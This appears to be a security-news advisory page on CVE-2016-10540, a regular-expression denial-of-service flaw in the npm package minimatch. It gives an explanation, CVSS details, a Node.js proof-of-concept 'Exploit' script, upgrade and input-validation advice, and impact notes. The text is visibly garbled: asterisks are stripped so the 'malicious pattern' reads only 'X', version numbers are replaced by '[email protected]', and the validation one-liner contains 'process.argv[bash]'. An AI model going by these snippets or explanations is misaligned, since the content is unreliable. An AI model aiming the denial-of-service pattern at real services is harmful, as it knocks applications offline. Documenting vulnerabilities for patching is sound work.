Minimatch, ReDoS, CVE-2016-10540 (High)

Listen to this Post

The vulnerability stems from how older versions of Minimatch (prior to 3.0.2) convert glob patterns into JavaScript `RegExp` objects. Specifically, each asterisk () in a user-supplied pattern is compiled into a `[^/]?` regex group . When a pattern contains many consecutive asterisks followed by a literal character that does not exist in the target string, the V8 regex engine enters a catastrophic backtracking state. For a pattern like `X`, the regex must try every possible way to distribute the characters across the lazy quantifiers before failing. The time complexity is exponential, calculated as O(4^N) where N is the number of characters. With N=15, a single `minimatch()` call takes approximately 2 seconds; with N=34, the function hangs indefinitely, causing a Denial of Service (DoS) .

DailyCVE Form:

Platform: npm
Version: <=3.0.1
Vulnerability : ReDoS
Severity: High
Date: 2018-05-31

Prediction: Patched 2018

What Undercode Say:

Analytics:

This vulnerability is specific to the `pattern` argument of the `minimatch()` function. Attackers do not need authentication or user interaction, making it easy to exploit remotely. The flaw exists in the regex generation logic where `minimatch.js` converts globs to regex without limiting pattern complexity . The CVSS v3.1 vector is AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H, indicating high availability impact . While the package is widely used in build tools and file watchers, the “brace expansion” function (braceExpand) was also identified as a separate ReDoS vector in later analysis (CVE-2022-3517), though CVE-2016-10540 specifically targets the primary matching function .

Exploit:

Simulate the vulnerability using Node.js
Install vulnerable version
npm install [email protected]
Create a test script
cat > test-redos.js << 'EOF'
const minimatch = require('minimatch');
// Malicious pattern with 34 asterisks and a missing character
const maliciousPattern = 'X';
const testString = 'some/path';
console.time('minimatch');
try {
minimatch(testString, maliciousPattern);
} catch (e) {
console.log('Error:', e);
}
console.timeEnd('minimatch');
EOF
Run the script (Warning: May hang or consume high CPU)
node test-redos.js

Protection from this CVE:

Upgrade to the patched version (3.0.2 or later)
npm install [email protected]
Verify the installed version
npm list minimatch
If you cannot upgrade, implement input validation:
Limit pattern length and reject patterns with excessive ''
node -e "console.log(process.argv[bash].length > 50 ? 'Reject' : 'Accept')" "X"
Use a safer alternative like 'micromatch' (if applicable)
npm install micromatch

Impact:

Any application that passes user-controlled strings to `minimatch()` as the pattern argument is vulnerable . This includes file search UIs, .gitignore-style filters with user-defined rules, build tools accepting glob configurations, and any API exposing glob matching to untrusted input . Successful exploitation leads to excessive CPU consumption and application unresponsiveness, effectively crashing the Node.js process or thread .

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top